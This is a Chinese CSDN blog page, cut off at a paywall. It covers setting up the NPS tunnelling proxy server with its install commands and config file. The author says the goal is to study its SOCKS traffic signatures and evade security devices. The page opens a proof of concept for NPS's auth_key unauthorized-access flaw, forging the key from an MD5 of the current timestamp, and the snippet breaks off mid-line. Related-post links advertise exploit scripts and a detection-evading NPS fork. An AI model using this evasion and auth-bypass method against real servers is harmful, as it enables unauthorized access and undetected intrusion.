NPS之Socks流量分析以及未授权复现

最新推荐文章于 2023-09-18 01:30:34 发布
最新推荐文章于 2023-09-18 01:30:34 发布
阅读量454 收藏 1
点赞数
文章标签: ubuntu 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2206/article/details/128919878
版权

前言

因为想要写一个socks的流量算法去绕过安全设备,所以这里对nps的流量特征总结一下,方便自己后期的魔改。

环境

ubuntu 16.04 vps server

windows server 2012R2 clinet

mkdir nps  
cd nps  
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz  
tar -zxvf linux_amd64_server.tar.gz  
./nps install

image-20220804172812482.png

cd /etc/nps/conf/  
vim nps.conf

配置文件

#web  
web_host=a.o.com  
web_username=xxxx    //管理端用户名  
web_password=xxxxxx  //管理端密码  
web_port = xxxxx     //管理端端口  
web_ip=0.0.0.0  
web_base_url=  
web_open_ssl=false  
web_cert_file=conf/server.pem  
web_key_file=conf/server.key  
#web_base_url=/nps

image-20220804173007236.png

##bridge  
bridge_type=tcp   //客户端连接协议tcp  
bridge_port=xxxx  //客户端连接端口  
bridge_ip=0.0.0.0

image-20220804173738483.png

bridge_port的默认端口默认为8024,这里不建议改为默认的,连接客户端的时候可能会触发安全设备规则

NPS未授权复现

POC

#encoding=utf-8  
import time  
import hashlib  
now = time.time()  
m = hashlib.md5()  
m.update(str(int(now)).encode("utf8"))  
auth_key = m.hexdigest()  
​  
print("Index/Index?auth_key=%s&time
最低0.47元/天 解锁文章
HarkAllen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nps auth_key授权访问漏洞
xiaokp7的博客
08-02 2220
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。其中auth_key 存在授权访问漏洞,当 nps.conf 中的 auth_key 配置时攻击者通过生成特定的请求包可以获取服务器后台权限。
nps 授权访问 利用exp脚本
08-18
nps 授权访问 利用exp脚本
nps内网穿透服务器搭建教程(阿里云)-小宇特详解
小宇的web博客
05-10 4072
nps内网穿透服务器搭建教程(阿里云)-小宇特详解 前期准备 1.一台云服务器 2.配置安全组 3.在自己的电脑上安装nps服务器的话自己买,我这里使用的是阿里云 讲一下配置安全组 打开阿里云的官网进行登录,打开控制台,然后点击云服务器ECS,点击实例。右边点击更多,打开网络和安全组,安全组配置 然后点击右侧的配置规则 这里的入方向是其他主机能够访问这台服务器的端口,出方向是这台服务器能够输出数据的端口 这里点击快速添加,我这里是将所有的端口都开放了。 这里要想nps搭建成功必须打开80 8024
内网代理流量:Socks5协议原理分析和编程
god_Zeo的安全博客
10-29 3398
0x00 前情提要 日常渗透演练中,代理是必不可少的,我们用的一般也都是CS自带socks4和代理工具的socks5协议,我们此时还要考虑在这个过程中的流量免杀的问题,所以还是要对底层的协议详细的看一下,然后对流量中的特征分析和修改一下 0x01 简介和流程 以下摘自维基百科 SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。SOCKS是”SOCKetS”的缩写[注 1]。 当防火墙后的客户端要访问外部的服务器时,就跟SOCKS代理服务器连接。这个代理服务器控制客户端访问外网的资
详细教你用NPS搭建内网穿透服务
星哲最开心
12-11 2866
详细教你用NPS搭建内网穿透服务
nps 授权访问 批量化检测脚本
08-18
--url 指定 一个url --file 可以 读取txt文件用来批量化检测
nps:一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal
05-12
NPS | NPS是具有功能强大的Web管理终端的轻型,高性能,功能强大的Intranet渗透代理服务器。 特征 全面的协议支持,与几乎所有常用协议兼容,例如tcp,udp,http(s),socks5,p2p,http代理... 全面的平台兼容性...
后端NPS
02-25
Comando CLI TypeORM实用程序严重的uma迁移: yarn typeorm migration:create -n {{name}}执行uma迁移无数据库: yarn typeorm migration:run回滚迁移(执行脱机): yarn typeorm migration:revert
蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用
08-02
蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用
nps 授权访问检测脚本 ——poc
weixin_55885866的博客
08-18 221
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
授权访问漏洞合集
m0_49420271的博客
07-24 933
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
魔改NPS,过流量检测,已修复漏洞
最新发布
潇湘信安的博客
09-18 1656
nps是渗透测试和红蓝攻防过程中常用的工具,通信流量比较稳定,但对流量特征抓的比较死,常常出现落地秒的情况,所以@Q16G师傅基于原版的nps进行二次开发。
【内网穿透】NPS工具实现内网穿透
zhipengit
12-02 1万+
官网的简介 NPS是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。 服务端安装 下载 github下载服务端和客户端:nps下载 vps可以wget下载,版本根据实际情况调整 wget https://github.com/ehang-io/nps/releases/do
nps内网穿透使用
夜未央人未眠
07-31 1562
github地址 https://github.com/cnlh/nps#%E7%A7%81%E5%AF%86%E4%BB%A3%E7%90%86 1.服务端(公网ip服务器) 在公网ip的服务器上安装server端 1)配置文件 下面conf/nps.conf文件供参考 appname = nps #Boot mode(dev|pro) runmode = dev #HTTP(S) proxy port, no startup if empty http_proxy_ip=0.0.0.0 http_p
java 抓包_关于抓包的碎碎念
weixin_39712705的博客
12-02 770
本文为看雪论坛优秀文章看雪论坛作者ID:ChenSem抓包是作为apk分析的首要切入点,获取apk的通信协议的必要手段。常见的抓包手段是基于中间人攻击来进行的,还有另外一种抓包手段是基于手机VPN进行的。这里将罗列常见的抓包手段,以及SSL Pinning手段的对抗。基于中间人攻击的抓包比较常规的抓包手段,常用的抓包工具有Burpsuite、Charles、Fiddler、Mitmpro...
Socks Proxy如何让你更安全的浏览互联网
Enweitech Software Works
03-06 4916
在不使用VPN的情况下如何保证在浏览网页数据的时候更安全更隐私呢?Socks proxy和SSH将会给你答案。在进入正题之前我们首先需要了解一下Socks proxy,什么是Socks proxy?Socks 服务器通常是作为一个代理服务器,充当一个中间代理的角色,与客户端以及真正的服务端建立TCP连接,然后负责对客户端与服务端之间的流量进行路由和转发。一个socks代理服务器能够与任何一种网络协...
内网穿透-NPS使用教程(SOCKS5代理)
热门推荐
ha0a0的博客
12-15 1万+
目录 一、软件介绍 二、环境介绍 三、配置步骤 1. 配置主要步骤: 2. 详细步骤: 2.1 安装 2.2 配置服务端 2.3 配置客户端 2.4 配置Socks 5代理 一、软件介绍 1.NPS:一款轻量级、高性能、功能强大的内网穿透反向代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等,此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。..
nps 授权访问 burp
09-13
NPS(Network Policy Server)是一种用于网络访问控制和AAA(认证、授权和计费)服务的Microsoft Windows Server组件。而Burp Suite是一款流行的web应用程序安全测试工具,主要用于发现和利用应用程序中的漏洞。 "NPS授权访问Burp" 可能指的是在使用Burp Suite进行web应用程序测试时,NPS服务器没有授权Burp Suite进行相关的网络访问。 这种情况可能发生在两个场景中: 1. NPS服务器中允许Burp Suite的访问:NPS服务器可能会有访问控制策略限制网络访问,而Burp Suite被认为是授权的访问。要解决这个问题,需要管理员在NPS服务器中设置相应的访问策略,允许Burp Suite进行网络访问。 2. Burp Suite证书被信任:Burp Suite在进行HTTPS通信时,会使用自己生成的证书进行加密。但是,如果NPS服务器不信任该证书,就会拒绝Burp Suite的访问。为了解决这个问题,可以在NPS服务器上导入Burp Suite生成的证书,建立起信任关系。 总之,解决"NPS授权访问Burp"的问题需要管理员在NPS服务器上进行相应的设置。确保NPS服务器允许Burp Suite进行网络访问,并且信任Burp Suite生成的证书。这样,就可以顺利地使用Burp Suite进行web应用程序安全测试了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值